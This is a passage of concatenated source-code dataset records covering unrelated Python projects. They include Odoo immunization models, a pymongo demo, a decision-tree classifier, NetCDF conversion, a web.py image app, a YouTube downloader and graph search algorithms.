comodel_name=\"hc.vs.vaccination.protocol.dose.target\", \n relation=\"immunization_vaccination_protocol_target_disease_rel\", \n string=\"Target Diseases\", \n required=\"True\", \n help=\"Disease immunized against.\") \n dose_status_id = fields.Many2one(\n comodel_name=\"hc.vs.vaccination.protocol.dose.status\", \n string=\"Dose Status\", \n required=\"True\", \n help=\"Indicates if dose counts towards immunity\") \n dose_status_reason_id = fields.Many2one(\n comodel_name=\"hc.vs.vaccination.protocol.dose.status.reason\", \n string=\"Dose Status Reason\", help=\"Why dose does (not) count\") \n\nclass ImmunizationIdentifier(models.Model): \n _name = \"hc.immunization.identifier\" \n _description = \"Immunization Identifier\" \n _inherit = [\"hc.basic.association\", \"hc.identifier\"]\n\n immunization_id = fields.Many2one(\n comodel_name=\"hc.res.immunization\", \n string=\"Immunization\", \n help=\"Immunization associated with this Immunization Identifier.\") \n\nclass ImmunizationNote(models.Model): \n _name = \"hc.immunization.note\" \n _description = \"Immunization Note\" \n _inherit = [\"hc.basic.association\", \"hc.annotation\"]\n\n immunization_id = fields.Many2one(\n comodel_name=\"hc.res.immunization\", \n string=\"Immunization\", \n help=\"Immunization associated with this Immunization Note.\") \n\nclass ImmunizationRoute(models.Model): \n _name = \"hc.vs.immunization.route\" \n _description = \"Immunization Route\" \n _inherit = [\"hc.value.set.contains\"]\n\nclass ImmunizationSite(models.Model): \n _name = \"hc.vs.immunization.site\" \n _description = \"Immunization Site\" \n _inherit = [\"hc.value.set.contains\"]\n\nclass VaccinationProtocolDoseStatus(models.Model): \n _name = \"hc.vs.vaccination.protocol.dose.status\" \n _description = \"Vaccination Protocol Dose Status\" \n _inherit = [\"hc.value.set.contains\"]\n\nclass VaccinationProtocolDoseStatusReason(models.Model): \n _name = \"hc.vs.vaccination.protocol.dose.status.reason\" \n _description = \"Vaccination Protocol Dose Status Reason\" \n _inherit = [\"hc.value.set.contains\"]\n\nclass VaccineCode(models.Model): \n _name = \"hc.vs.vaccine.code\" \n _description = \"Vaccine Code\" \n _inherit = [\"hc.value.set.contains\"]\n\nclass VaccinationProtocolDoseTarget(models.Model): \n _name = \"hc.vs.vaccination.protocol.dose.target\" \n _description = \"Vaccination Protocol Dose Target\" \n _inherit = [\"hc.value.set.contains\"]\n\nclass ImmunizationReason(models.Model): \n _name = \"hc.vs.immunization.reason\" \n _description = \"Immunization Reason\" \n _inherit = [\"hc.value.set.contains\"]\n\nclass NoImmunizationReason(models.Model): \n _name = \"hc.vs.no.immunization.reason\" \n _description = \"No Immunization Reason\" \n _inherit = [\"hc.value.set.contains\"]\n\n","sub_path":"addons/hc_immunization/models/hc_res_immunization.py","file_name":"hc_res_immunization.py","file_ext":"py","file_size_in_byte":9824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"596348463","text":"from pymongo import MongoClient\nimport datetime\nimport pprint\n\n\nclient = MongoClient('localhost', 27017)\ndb = client.test_database\n\nposts = db.posts\nprint(db);\n\n\npost = {\"author\": \"Mike\",\n \"text\": \"My first blog post!\",\n \"tags\": [\"mongodb\", \"python\", \"pymongo\"],\n \"date\": datetime.datetime.utcnow()}\n\npost_id = posts.insert_one(post).inserted_id\n# After inserting the first document, the posts collection has actually been created on the server.\n\n\nprint(post_id)\npprint.pprint(posts.find_one())\npprint.pprint(posts.find_one({\"author\": \"Mike\"}))\n\nnew_posts = [{\"author\": \"Mike\",\n \"text\": \"Another post!\",\n \"tags\": [\"bulk\", \"insert\"],\n \"date\": datetime.datetime(2009, 11, 12, 11, 14)},\n {\"author\": \"Eliot\",\n \"title\": \"MongoDB is fun\",\n \"text\": \"and pretty easy too!\",\n \"date\": datetime.datetime(2009, 11, 10, 10, 45)}]\nresult = posts.insert_many(new_posts)\n\n\nfor post in posts.find():\n pprint.pprint(post)\n \nfor post in posts.find({\"author\": \"Mike\"}):\n pprint.pprint(post)\n\n","sub_path":"python/python_to_mongo/prova_server.py","file_name":"prova_server.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"66381529","text":"from Arvore import Aprendizado, Maioria, MostraArvore, Classificar\nfrom Leitura import Atributos_Exemplos\nfrom datetime import datetime as dt\nimport os\nfrom Split import split_train_test\n\nt = dt.now()\n# attributes = {0: [\"Ensolarado\", \"Nublado\", \"Chuvoso\"], 1: [\"Quente\", \"Boa\", \"Fria\"],\n# 2: [\"Alta\", \"Normal\"], 3: [\"Forte\", \"Fraco\"]}\n#\n# examples = [[\"Ensolarado\", \"Quente\", \"Alta\", \"Fraco\", \"NAO\"],\n# [\"Ensolarado\", \"Quente\", \"Alta\", \"Forte\", \"NAO\"],\n# [\"Nublado\", \"Quente\", \"Alta\", \"Fraco\", \"SIM\"],\n# [\"Chuvoso\", \"Boa\", \"Alta\", \"Fraco\", \"SIM\"],\n# [\"Chuvoso\", \"Fria\", \"Normal\", \"Fraco\", \"SIM\"],\n# [\"Chuvoso\", \"Fria\", \"Normal\", \"Forte\", \"NAO\"],\n# [\"Nublado\", \"Fria\", \"Normal\", \"Forte\", \"SIM\"],\n# [\"Ensolarado\", \"Boa\", \"Alta\", \"Fraco\", \"NAO\"],\n# [\"Ensolarado\", \"Fria\", \"Normal\", \"Fraco\", \"SIM\"],\n# [\"Chuvoso\", \"Boa\", \"Normal\", \"Fraco\", \"SIM\"],\n# [\"Ensolarado\", \"Boa\", \"Normal\", \"Forte\", \"SIM\"],\n# [\"Nublado\", \"Boa\", \"Alta\", \"Forte\", \"SIM\"],\n# [\"Nublado\", \"Quente\", \"Normal\", \"Fraco\", \"SIM\"],\n# [\"Chuvoso\", \"Boa\", \"Alta\", \"Forte\", \"NAO\"]]\nexamples, attributes = Atributos_Exemplos()\nprint(dt.now() - t)\n\n# t = dt.now()\n# arvore = Aprendizado(examples, attributes, Maioria(examples))\n# print(dt.now() - t)\n\n# MostraArvore(arvore)\n\n\"\"\"\nSegmentar dados\n\"\"\"\ntrain, test = split_train_test(examples, 0.6)\nprint('Dividido')\n\nt = dt.now()\narvore = Aprendizado(train, attributes, Maioria(train))\nprint(dt.now() - t)\n\nresult = []\nfor line in test:\n result.append(Classificar(arvore, line))\n\nacerto = 0\nfor i in range(len(test)):\n print('ESPERADO: {:5} | OBTIDO: {:5}'.format(test[i][-1], result[i]))\n if result[i] == test[i][-1]:\n acerto += 1\n\nprint(acerto/len(result))\n\n\nos.system('play -nq -t alsa synth {} sine {}'.format(0.3, 440))\n# print(Classificar(arvore, [\"Ensolarado\", \"Fria\", \"Alta\", \"Forte\"]))\n","sub_path":"Laboratorio3/Classificacao.py","file_name":"Classificacao.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"292636336","text":"\nimport nmc_verification.nmc_vf_base as nmb\nimport numpy as np\nimport datetime\nimport pandas as pd\n\ndef test_read_write_micaps4():\n path = r\"H:\\task\\develop\\python\\git\\nmc_met_class\\nmc_met_class\\tests\\test_data\\grid_fo.txt\"\n grd = nmb.io.rg.read_from_micaps4(path)\n nmb.io.wg.write_to_micaps4(grd)\n sta = nmb.fun.gxy_sxy.transform(grd)\n grd1 = nmb.fun.sxy_gxy.transform(sta)\n nmb.io.wg.write_to_micaps4(grd1)\n #print(sta)\n\ndef test_read_nc():\n path = r\"K:\\paper13\\m8\\18010100.003.nc\"\n #path = r\"H:\\task\\develop\\python\\git\\nmc_met_class\\nmc_met_class\\tests\\a.txt\"\n #from nmc_met_class.io.read_DataArray import read_from_nc\n grd = nmb.io.rg.read_from_nc(path)\n grd = nmb.bd.set_coords(grd,level=850,time='2019051901',dtime=\"4d\")\n #nmc.io.wg.write_to_nc(grd,scale_factor=1)\n grid0 = nmb.bd.get_grid_of_data(grd)\n\n grd0 = nmb.bd.grid_data(grid0)\n\n nmb.io.wg.write_to_micaps4(grd0)\n print(grd)\n\n\ndef color_negative_red(val):\n \"\"\"\n Takes a scalar and returns a string with\n the css property `'color: red'` for negative\n strings, black otherwise.\n \"\"\"\n color = 'red' if val < 2 else 'black'\n return 'color: %s' % color\n\ndef interpolation():\n path = r\"H:\\task\\develop\\python\\git\\nmc_met_class\\nmc_met_class\\tests\\test_data\\grid_fo.txt\"\n grd = nmb.io.rg.read_from_micaps4(path)\n #grid0 = nmc.bd.get_grid_of_data(grd)\n print(grd)\n grid0 = nmb.bd.grid([80,130,0.125],[20,40,0.125])\n print(grid0.tostring())\n grd1 = nmb.fun.gxy_gxy.interpolation_linear(grd,grid0,reserve_other_dim=True)\n print(grd1)\n nmb.io.wg.write_to_micaps4(grd1)\n\n path = r\"H:\\task\\develop\\python\\git\\nmc_met_class\\nmc_met_class\\tests\\test_data\\评分站点.txt\"\n station = nmb.io.rs.read_from_micaps3(path)\n print(station)\n sta1 = nmb.fun.gxy_sxy.cubicInterpolation(grd1, station)\n nmb.io.ws.write_to_micaps3(sta1)\n print(sta1.style.applymap(color_negative_red))\n\n pass\n\n#interpolation()\n\ndef test_read_m3():\n path = r\"H:\\task\\develop\\python\\git\\nmc_met_class\\nmc_met_class\\tests\\test_data\\评分站点.txt\"\n station = nmb.io.rs.read_from_micaps3(path)\n #print(station)\n sta4 = nmb.fun.get_from_sta_data.get_by_id_list(station, [59954, 59981])\n #print(sta4)\n station['data0'] = 0\n path = r\"H:\\task\\develop\\python\\git\\nmc_met_class\\nmc_met_class\\tests\\test_data\\rain_without0.txt\"\n sta = nmb.io.rs.read_from_micaps3(path,station= station,reserve_time_dtime_level=True)\n #print(sta)\n grid0 = nmb.bd.grid([70,140,0.5],[10,60,0.5])\n background = nmb.bd.grid_data(grid0)\n grd = nmb.fun.sxy_gxy.sta_to_grid_oa2(sta, background=background,sm=0.1)\n\n nmb.io.wg.write_to_micaps4(grd)\n print(grd)\n\ntest_read_m3()\n\n#test_read_write_micaps4()","sub_path":"build/lib/nmc_verification/tests/test_io.py","file_name":"test_io.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"157707634","text":"# json encoder from html page\r\ndef formatgoal(value):\r\n result = {}\r\n fltr = []\r\n counter = []\r\n\r\n f = open(\"data.txt\")\r\n for line in f:\r\n counter = line.split(\"\\t\")\r\n fltr.append(counter[1])\r\n result[counter[1]] = counter[0]\r\n f.close\r\n f = open(\"output.txt\", \"w\")\r\n for goal, id in result.items():\r\n if goal == fltr[0]:\r\n f.write(\"{\" + '\"Default\": {}'.format(value) + \",\\n\")\r\n elif goal != fltr[-1]:\r\n f.write('\"' + goal + '\": ' + id + \",\\n\")\r\n else: \r\n f.write('\"' + goal + '\": ' + id + \"}\")\r\n\r\n f.close\r\n\r\n\r\nif __name__ == \"__main__\":\r\n formatgoal(input(\"Default id: \"))","sub_path":"formatgoals.py","file_name":"formatgoals.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"546954630","text":"#!/usr/bin/env python\n#coding:utf-8\n#Copyright (C) dirlt\n\nimport web\nimport util\nfrom PIL import Image\n\nurls = ('/upload', 'upload',\n '/.*', 'home')\n\napp = web.application(urls, globals())\n\nhome_html = open('home.html').read()\nclass home:\n def GET(self):\n return home_html\n\nimport cgi\n\"\"\"\nweb input\n\nfile_content_type = image/png\nfile_size = 3625446\nfile_path = /tmp/nginx_upload/0000000022\nfile_md5 = 1f7e1395ccc314e684eb4f46f4112308\n\"\"\"\noutput_html = open('output.html').read()\nredirect_html = open('redirect.html').read()\nTEST = True\nCACHE = False\nimport os\nclass upload:\n def GET(self):\n return self.POST()\n\n def POST(self):\n if not TEST:\n winput = web.input()\n path = winput['imgfile_path']\n ctype = winput['imgfile_content_type']\n fsize = int(winput['imgfile_size'])\n fmd5 = winput['imgfile_md5']\n else:\n path = './sample.jpg'\n ctype = 'image/jpeg'\n fsize = 135 * 1024\n fmd5 = 'md5-of-sample-jpg'\n if not ctype.startswith('image') or fsize > 8 * 1024 * 1024:\n return \"Not image or image file is too large(<8MB)\"\n image_html_file = '%s.html' % (fmd5)\n image_html_path = '/tmp/ascii_image_output/%s' % (image_html_file)\n # if cached.\n if CACHE and os.path.exists(image_html_path): return redirect_html % (locals())\n # resize image.\n rim = Image.open(path).convert('RGB')\n W = 120\n im = rim.resize((W, int(rim.size[1] * W / rim.size[0])))\n # write html file.\n image_html = util.image2html(im, constrast = True, font_color = True)\n with open(image_html_path, 'w') as fh: fh.write(output_html % (locals()))\n return redirect_html % (locals())\n\nwsgiapp = app.wsgifunc()\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"codes/py/ascii-image/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"537719014","text":"# import libraries\nimport os\nfrom osgeo import gdal\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom osgeo import osr\nimport h5py\n\n'''xdist = (Enx - E0) / float(nx)\nydist = (Nny - N0) / float(ny)\nrtx = (Eny - E0) / float(ny)\nrty = (Nnx - N0) / float(nx)'''\n\n\ndef getNcPath(NetCdf_data_path):\n\treturn [f for f in os.listdir(NetCdf_data_path) if f.endswith('.nc')]\n\ndef getNCGeoTrans2(file, LonS, LatS ):\n '''Extract Geotransform from Longitude and Latitude destination file'''\n \n f = h5py.File(file, 'r')\n lon = f[LonS][:]\n lat = f[LatS][:]\n\n ny, nx = lon.shape\n\n E0, Enx, Eny, Enxny = lon[0, 0], lon[0, nx-1], lon[ny-1, 0], lon[ny-1, nx-1]\n N0, Nny, Nnx, Nnxny = lat[0, 0], lat[ny-1, 0], lat[0, nx-1], lat[ny-1, nx-1]\n\n A = np.array([[1, nx, 0, 0, 0, 0],[1, 0, ny, 0, 0, 0],[0, 0, 0, 1, 0, ny],[0, 0, 0, 1, nx, 0],[1, nx, ny, 0, 0, 0],[0, 0, 0, 1, nx, ny],[1, 0, 0, 0, 0, 0],[0, 0, 0, 1, 0, 0]])\n C = np.array([Enx, Eny, Nny, Nnx, Enxny, Nnxny, E0, N0]).reshape(8,1)\n Gt = np.linalg.solve(np.dot(A.T,A), np.dot(A.T,C))\n return (Gt[0], Gt[1], Gt[2], Gt[3], Gt[4], Gt[5])\n\n# location to the inputfile\nfilePath = \"D:/Image/Poe/Acolyte/S2B_MSIL1C_20180320T230859last/\"\nNetCdfFilename = getNcPath(filePath)\nFileLocation = filePath+NetCdfFilename[0]\n'''if os.path.exists(FileLocation[:-3]):\n\tif os.path.exists(FileLocation[:-3]+'_bis'):\n\t\tos.mkdir(FileLocation[:-3]+'_bis_bis')\n\telse:\n\t\tos.mkdir(FileLocation[:-3]+'_bis')\nelse:\n\tos.mkdir(FileLocation[:-3])'''\n\n# open the file\ndat = gdal.Open(FileLocation, gdal.GA_ReadOnly)\nif dat == None:\n\tprint('oups')\n \n# Get the Precipitation dataset\ndataset = dat.GetSubDatasets()[6]\n\n# read the precipitation dataset\ndata = gdal.Open(dataset[0],gdal.GA_ReadOnly)\n \n# get the data of the precipitation dataset\ndataBand = data.ReadAsArray()\n \n# get geotransform\n'''GeoT = data.GetGeoTransform()'''\nLonS = 'lon'\nLatS = 'lat'\nGeoT = getNCGeoTrans2(FileLocation, LonS, LatS )\nprint(GeoT)\n \n# set geotif driver\ndriver = gdal.GetDriverByName( 'GTiff' )\n \n# get x,y dimensions of the map\nRastXsize = data.RasterXSize\nRastYsize = data.RasterYSize\n \n# set output name\noutname = \"testFullIm.tif\"\n \n# set projection\ntarget = osr.SpatialReference()\ntarget.ImportFromEPSG(4326)\n \n# write dataset to disk\noutputDataset = driver.Create(outname, RastXsize,RastYsize, 1,gdal.GDT_Float32)\noutputDataset.SetGeoTransform(GeoT)\noutputDataset.SetProjection(target.ExportToWkt())\noutputDataset.GetRasterBand(1).WriteArray(dataBand)\noutputDataset.GetRasterBand(1).SetNoDataValue(-9999)\noutputDataset = None","sub_path":"Poe/Scripts/OpticalDataManagement/ConvertNetcdf2Tif.py","file_name":"ConvertNetcdf2Tif.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"351217449","text":"from django.urls import path, re_path\n\nfrom . import views\n\napp_name = \"encyclopedia\"\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n re_path(r\"^wiki/(?P\\w*)/$\", views.wiki, name=\"wiki\"),\n path(\"search\", views.search, name=\"search\"),\n path(\"new\", views.new, name=\"new\"),\n path(\"edit/<str:title>\", views.edit, name=\"edit\")\n]\n","sub_path":"encyclopedia/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"298779995","text":"'''\nParse input and run appropriate code.\nDon't use this file for the actual work; only minimal code should be here.\nWe just parse input and call methods from other modules.\n'''\nfrom __future__ import division, print_function\n#do NOT import ways. This should be done from other files\n#simply import your modules and call the appropriate functions\nfrom astar import Astar\nfrom assured import get_assured_path\nfrom search import AstarTimeEvaluator, AstarLightsEvaluator\n\n\ndef simple(source, target):\n 'call function to find path, and return list of indices' \n astar = Astar(evaluator = AstarTimeEvaluator())\n path = astar.run_astar(source, target)\n return path\n\n \ndef lights(source, target):\n 'call function to find resume_path, and return list of indices'\n astar = Astar(evaluator = AstarLightsEvaluator()) \n path = astar.run_astar(source, target)\n return path\n \ndef assured(source, target, time, confidence):\n N = 20\n K = 5\n astar = Astar(evaluator = AstarTimeEvaluator())\n path = get_assured_path(source, target, time, confidence, astar, N, K)\n return path\n\n\ndef dispatch(argv):\n from sys import argv\n source, target = int(argv[2]), int(argv[3])\n try:\n if argv[1] == 'simple':\n resume_path = simple(source, target)\n elif argv[1] == 'lights':\n resume_path = lights(source, target)\n elif argv[1] == 'assured':\n time, confidence = int(argv[4]), float(argv[5])\n resume_path = assured(source, target, time, confidence)\n print(' '.join(str(j) for j in resume_path))\n except Exception:\n print('Cannot find a path')\n \n \n \n\nif __name__ == '__main__':\n from sys import argv\n dispatch(argv)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"244411202","text":"#! /usr/bin/env python\n#\n# EventRate.py\n#\n# This module is the implementation of the stage2 analysis. The main\n# purpose of stage2 is to combine the \"oscillated Flux maps\" with the\n# weighted effective areas to create oscillated event rate maps,\n# using the true information.\n# \n# If desired, this will create a .json output file with the results of\n# the current stage of processing.\n#\n# author: Timothy C. Arlen\n#\n# tca3@psu.edu\n#\n# date: April 8, 2014\n#\n\nimport os,sys\nimport numpy as np\nimport logging\nfrom argparse import ArgumentParser, RawTextHelpFormatter\nfrom utils.utils import set_verbosity,is_equal_binning\nfrom utils.json import from_json, to_json\nfrom AeffService import AeffServiceMC\nfrom scipy.constants import Julian_year\n\ndef get_event_rates(osc_flux_maps,sim_file=None,livetime=None,nu_xsec_scale=None,\n nu_bar_xsec_scale=None,**kwargs):\n '''\n Main function for this module, which returns the event rate maps\n for each flavor and interaction type, using true energy and zenith\n information. The content of each bin will be the weighted aeff\n multiplied by the oscillated flux, so that the returned dictionary\n will be of the form:\n {'nue': {'cc':map,'nc':map},\n 'nue_bar': {'cc':map,'nc':map}, ...\n 'nutau_bar': {'cc':map,'nc':map} }\n '''\n\n # Verify consistent binning.\n ebins = osc_flux_maps['nue']['ebins']\n czbins = osc_flux_maps['nue']['czbins']\n flavours = ['nue','numu','nutau','nue_bar','numu_bar','nutau_bar']\n if not np.alltrue([is_equal_binning(ebins,osc_flux_maps[nu]['ebins']) for nu in flavours]):\n raise Exception('Osc flux maps have different energy binning!')\n if not np.alltrue([is_equal_binning(czbins,osc_flux_maps[nu]['czbins']) for nu in flavours]):\n raise Exception('Osc flux maps have different coszen binning!')\n\n logging.info(\"Defining aeff_service...\")\n aeff_service = AeffServiceMC(ebins,czbins,simfile)\n aeff_dict = aeff_service.get_aeff()\n \n # apply the scaling for nu_xsec_scale and nubar_xsec_scale...\n \n event_rate_maps = {}\n for flavour in flavours:\n osc_flux_map = osc_flux_maps[flavour]['map']\n int_type_dict = {}\n for int_type in ['cc','nc']:\n event_rate = osc_flux_map*aeff_dict[flavour][int_type]*livetime*Julian_year\n int_type_dict[int_type] = {'map':event_rate,\n 'ebins':ebins,\n 'czbins':czbins}\n event_rate_maps[flavour] = int_type_dict\n \n return event_rate_maps\n\nif __name__ == '__main__':\n\n #Only show errors while parsing \n set_verbosity(0)\n parser = ArgumentParser(description='Take an oscillated flux file '\n 'as input and write out a set of oscillated event counts. ',\n formatter_class=RawTextHelpFormatter)\n parser.add_argument('osc_flux_file',metavar='FLUX',type=from_json,\n help='''JSON osc flux input file with the following parameters:\n {\"nue\": {'czbins':[], 'ebins':[], 'map':[]}, \n \"numu\": {...},\n \"nutau\": {...},\n \"nue_bar\": {...},\n \"numu_bar\": {...},\n \"nutau_bar\": {...} }''')\n parser.add_argument('weighted_aeff_file',metavar='WEIGHTFILE',type=str,\n help='''HDF5 File containing data from all flavours for a particular instumental geometry. \nExpects the file format to be:\n {\n 'nue': {\n 'cc': {\n 'weighted_aeff': np.array,\n 'true_energy': np.array,\n 'true_coszen': np.array,\n 'reco_energy': np.array,\n 'reco_coszen': np.array\n },\n 'nc': {...\n }\n },\n 'nue_bar' {...},...\n } ''')\n parser.add_argument('--livetime',type=float,default=1.0,\n help='''livetime in years to re-scale by.''')\n parser.add_argument('--nu_xsec_scale',type=float,default=1.0,\n help='''Overall scale on nu xsec.''')\n parser.add_argument('--nubar_xsec_scale',type=float,default=1.0,\n help='''Overall scale on nu_bar xsec.''')\n parser.add_argument('-o', '--outfile', dest='outfile', metavar='FILE', type=str,\n action='store',default=\"event_rate.json\",\n help='''file to store the output''')\n parser.add_argument('-v', '--verbose', action='count', default=0,\n help='''set verbosity level''')\n args = parser.parse_args()\n\n #Set verbosity level\n set_verbosity(args.verbose)\n\n livetime = args.livetime\n nu_xsec_scale = args.nu_xsec_scale\n nubar_xsec_scale = args.nubar_xsec_scale\n event_param_dict = {'livetime':livetime,'nu_xsec_scale':nu_xsec_scale,\n 'nubar_xsec_scale':nubar_xsec_scale}\n\n for name,param in zip([\"livetime\",\"nu xs scale\",\"nubar xs scale\"],\n [livetime,nu_xsec_scale,nubar_xsec_scale]):\n logging.debug(\"%14s: %s \"%(name,param))\n\n logging.info(\"Getting oscillated flux...\") \n osc_flux_maps = args.osc_flux_file\n simfile = args.weighted_aeff_file\n\n event_rate_maps = get_event_rates(osc_flux_maps,simfile,livetime,\n nu_xsec_scale,nubar_xsec_scale)\n\n event_rate_maps['params'] = dict(osc_flux_maps['params'].items() + \n event_param_dict.items())\n logging.info(\"Saving output to .json file...\")\n to_json(event_rate_maps,args.outfile)\n \n \n","sub_path":"trigger/EventRate.py","file_name":"EventRate.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"85337369","text":"from threading import Thread\nfrom rpicenter import state\nfrom rpicenter.adapter import Adapter\n\nimport RPi.GPIO as gpio\n\ndef _check_slot_used(device, slot):\n\tfor a in state._adapters:\n\t\tif a._device_object_id == id(device) and a._slot == slot:\n\t\t\treturn True\n\treturn False\n\ndef _check_pin_used(gpio_pin):\n\tfor a in state._adapters:\n\t\tif a._gpio_pin == gpio_pin:\n\t\t\treturn True\n\treturn False\n\ndef reg_adapter(device, slot, gpio_pin):\n\tif _check_slot_used(device, slot):\n\t\traise Exception('Slot {} is already used'.format(slot))\n\t\n\tif _check_pin_used(gpio_pin):\n\t\traise Exception('GPIO pin {} is already used'.format(gpio_pin))\n\t\n\tstate._adapters.append(Adapter(id(device), slot, gpio_pin))\n\ndef reg_device(device):\n\tfor d in state._devices:\n\t\tif id(d) == id(device):\n\t\t\traise Exception('Device is already registered')\n\tstate._devices.append(device)\n\tstate._device_threads.append(Thread(target = device.loop))\n\ndef loop():\n\tfor t in state._device_threads:\n\t\tt.start()\n\ndef wait():\n\tfor t in state._device_threads:\n\t\tt.join()\n\ndef request_stop():\n\tfor d in state._devices:\n\t\td.request_stop()\n\ndef cleanup():\n\tfor d in state._devices:\n\t\td.cleanup()\t\n\tstate._device_threads = []\n\tstate._devices = []\n\tstate._adapters = []\n\t\n\tgpio.cleanup()\n\t\n\n\n\n\n\n\n","sub_path":"rpicenter/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"399449565","text":"import pytube\nimport os\nimport subprocess\n# 다운 받을 동영상 url 지정\nyt = pytube.YouTube('https://www.youtube.com/watch?v=Kbj2Zss-5GY')\n\nvideos = yt.streams.all()\n\nfor i in range(len(videos)):\n print(i,',',videos[i])\n\ndown_dir = \"C:\\YouTube\"\n\n\ncnum =int(input(\"다운 받을 화질은(0~21 입력)\"))\n\nvideos[cnum].download(down_dir)\n\nnewfilename =input('변환할 mp3 파일명은?')\noriginalfilename =videos[cnum].default_filename\n\n\n\nsubprocess.call(['ffmpeg', '-i',\nos.path.join(down_dir,originalfilename),\nos.path.join(down_dir,newfilename)])\n\n\nprint('동영상 다운로드 및 mp3 변환완료')\n","sub_path":"youtube-download.py","file_name":"youtube-download.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"427381389","text":"import math\n\n#Node class, handles everything to do with nodes themselves\nclass Node(object):\n #initialization\n def __init__(self, value):\n self.value = value\n self.adjacent = {}\n\n #add adjacent node\n def add_next(self, nextTo, weight):\n self.adjacent[nextTo] = weight\n\n #return nodes value (not node location)\n def get_value(self):\n return self.value\n\n #return length of adjacent dictionary\n def get_adjacent_length(self):\n return len(self.adjacent)\n\n #return adjacent dictionary as a list\n def get_adjacent_as_list(self):\n printList = []\n for item in self.adjacent:\n printList.append(self.adjacent[item].get_value())\n return printList\n\n #return adjacent dictionary as a dictionary\n def return_adjacent(self):\n return self.adjacent\n\n #return weight of node argument\n def get_weight(self, node):\n return self.adjacent[node]\n \n#Graph class, allows the actual creation of the graph, and handles all graph related queries\nclass Graph:\n \n #initialization\n def __init__(self):\n self.dict = {}\n\n #creates and adds node to graph\n def add_node(self, value):\n node = Node(value)\n self.dict[value] = node\n print(\"Node: \" + str(value) + \" has been created\")\n\n #adds adjacent node to node\n def add_edge(self, node, adjacent_node, weight=0):\n self.dict[node].add_next(self.dict[adjacent_node], weight)\n self.dict[adjacent_node].add_next(self.dict[node], weight)\n\n #print graph in a readable form\n def print_graph(self):\n keyList = []\n for key in self.dict:\n keyList.append(key)\n for item in keyList:\n print(str(item) + \", adjacent nodes: \" +\n str(self.dict[item].get_adjacent_as_list()) +\n \" (\" + str(self.dict[item].get_adjacent_length()) + \")\")\n\n #DFS function implementation. runs DFS algorithm, and returns\n def depth_first_search(self, node):\n stack = []\n visited = []\n stack.append(node)\n while len(stack) != 0:\n u = stack.pop()\n if u not in visited:\n visited.append(u)\n for item in self.dict[u].return_adjacent():\n nodey = item.get_value()\n stack.append(nodey)\n return visited\n\n #BFS function implementation. runs BFS algorithm, and returns\n def breadth_first_search(self, node):\n stack = []\n visited = []\n stack.append(node)\n while len(stack) != 0:\n u = stack.pop(0)\n if u not in visited:\n visited.append(u)\n for item in self.dict[u].return_adjacent():\n nodey = item.get_value()\n stack.append(nodey)\n return visited\n\n #dijkstra algorithm, 2 arguments\n def dijkstra(self, node_source, node_destination):\n #print(self.dict[node_source].return_adjacent())\n print(\"Algorithm start\")\n v = node_source\n tw = {}\n fastest_route = []\n for item in self.dict:\n tw[item] = math.inf\n tw[node_source] = 0\n visited = []\n\t\t\n\t#loop as long as v is not equal to node_destination\n while v != node_destination:\n #return node adjacent list, loop over each item\n for item in self.dict[v].return_adjacent():\n theDict = self.dict[v].return_adjacent()\n if tw[v] + theDict[item] < tw[item.get_value()]:\n print(tw[v])\n print(theDict[item])\n print(tw[item.get_value()])\n tw[item.get_value()] = tw[v]+theDict[item]\n fastest_route.append(v)\n \n visited.append(v)\n print(visited)\n mini = math.inf\n #return node adjacent list, loop over each item again\n for item in self.dict[v].return_adjacent():\n print(str(item.get_value()) + \" = item\")\n #not in visited list, and meets critera\n if item.get_value() not in visited and tw[item.get_value()] < mini:\n v = item.get_value()\n mini = tw[item.get_value()]\n print(str(v) + \" = v integer\")\n\n #removes duplicate nodes from list, prints in readable way\n tempList = []\n for i in range(len(fastest_route)):\n if fastest_route[i] not in tempList:\n tempList.append(fastest_route[i])\n print(\"The fastest route to your destination node is: \" + str(tempList))\n \n \n \n\t\t\n\t\n\n\n\n#Runs program with nodes that allow it to work.\nif __name__ == '__main__':\n\n graph = Graph()\n\n## commented due to no longer use for dijkstra's.\n## graph.add_node(5)\n## graph.add_node(1)\n## graph.add_node(3)\n## graph.add_node(4)\n## graph.add_node(7)\n## graph.add_node(9)\n## graph.add_node(2)\n## graph.add_edge(5, 1, 15)\n## graph.add_edge(1, 3)\n## graph.add_edge(3, 4)\n## graph.add_edge(4, 7, 12)\n## graph.add_edge(7, 9, 9)\n## graph.add_edge(9, 2)\n## graph.add_edge(2, 5)\n #graph.print_graph()\n\n #graph.dijkstra(5, 2)\n## #runs DFS and BFS\n## dfs = graph.depth_first_search(5)\n## bfs = graph.breadth_first_search(5)\n##\n## #writes DFS and BFS traversal to text file.\n## with open('graph_traversals.txt', 'a') as file:\n## file.write(\"DFS: \" + str(dfs) + \"\\n\")\n## 